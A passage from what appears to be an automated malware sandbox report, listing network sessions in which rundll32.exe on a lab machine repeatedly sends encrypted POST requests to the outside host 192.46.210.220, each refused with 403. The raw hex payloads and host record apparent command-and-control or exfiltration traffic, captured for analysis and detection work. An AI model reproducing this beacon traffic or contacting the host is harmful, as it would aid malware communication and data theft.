fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:52 UTC	246	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:52 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.3	49986	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:51 UTC	242	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:51 UTC	242	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:52 UTC	246	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:52 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49765	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:23 UTC	24	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:23 UTC	24	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:24 UTC	29	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:24 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.3	49992	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:56 UTC	247	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:56 UTC	247	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:56 UTC	251	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:56 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.3	49994	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:27:57 UTC	252	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:27:57 UTC	252	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:27:57 UTC	256	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:27:57 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.3	50011	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:00 UTC	257	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:00 UTC	257	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:00 UTC	261	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:00 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.3	50018	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:01 UTC	261	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:01 UTC	262	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:01 UTC	266	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:01 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.3	50032	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:03 UTC	266	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:03 UTC	266	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:04 UTC	271	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:04 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.3	50034	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:05 UTC	271	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:05 UTC	271	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:05 UTC	276	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:05 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.3	50040	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:07 UTC	276	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:07 UTC	276	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:08 UTC	281	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:08 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.3	50042	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:08 UTC	281	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:08 UTC	281	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:09 UTC	286	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:09 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.3	50048	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:11 UTC	286	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:11 UTC	286	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:12 UTC	291	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:12 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.3	50050	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:12 UTC	291	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:12 UTC	291	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:13 UTC	296	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:13 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49772	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:27 UTC	29	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:27 UTC	29	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:28 UTC	39	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:27 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.3	50056	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:15 UTC	296	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:15 UTC	296	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:16 UTC	301	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:16 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.3	50058	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:16 UTC	301	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
